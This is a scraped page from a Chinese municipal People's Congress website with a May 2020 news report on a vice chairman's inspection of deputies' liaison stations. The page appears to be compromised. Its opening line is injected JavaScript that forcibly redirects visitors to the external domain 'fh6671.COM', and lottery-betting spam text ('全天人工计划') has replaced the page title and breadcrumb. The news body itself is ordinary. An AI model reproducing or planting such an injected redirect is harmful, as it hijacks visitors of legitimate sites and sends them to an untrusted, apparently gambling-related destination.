function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  代表活动  
市人大常委会副主任韩峻峰走访了解人大代表之家(站)工作运行情况
来源: 代表人事工作委员会      日期: 2020-05-15      作者: 张进元      点击数:

 

市人大常委会副主任韩峻峰走访了解人大代表之家(站)工作运行情况

 

人大代表参加人大代表之家、工作站活动是广泛倾听民心民意、实现人民当家作主的有效途径。为贯彻落实《中共嘉峪关市委关于加强新时代人大工作的意见》精神,做好人大代表之家(站)制度化、规范化、标准化建设,健全代表联络机制。5月13日,市人大常委会副主任韩峻峰带领市人大常委会代表人事工作委员会工作人员,先后对非公经济人大代表之家、钢城街道人大代表之家、利民社区人大代表工作站、雄关街道人大代表之家、胜利社区人大代表工作站、峪泉镇人大代表之家建设、开展活动等情况进行走访了解。

通过听、看、问、查等方式,市人大常委会副主任韩峻峰详细了解了人大代表之家、工作站建设情况了解了人大代表回选区、见选民、走基层、下一线联系群众,服务群众的实际情况,听取人大代表之家工作站建设存在的困难和问题代表履职监督、代表培训等活动开展的意见建议并针对各人大代表之家(站)工作中提出的问题和建议逐一解答,零距离进行了交流。

   最后,韩峻峰对人大代表之家(站)提出要求,希望各人大代表之家(站)在现有工作运行基础上继续努力,高起点、高标准、高质量地推进人大代表之家的规范化建设本着“科学设置、方便代表、利于活动”的原则,做到“硬件”建设标准化通过建立健全相关制度,保证代表开展活动的常化、制度化和规范化,做到“软件”建设制度化把人大代表之家(站)真正作为代表学习培训之家、服务群众之家、履职交流之家、帮扶解困之家、规范活动之家,做到代表活动常态化。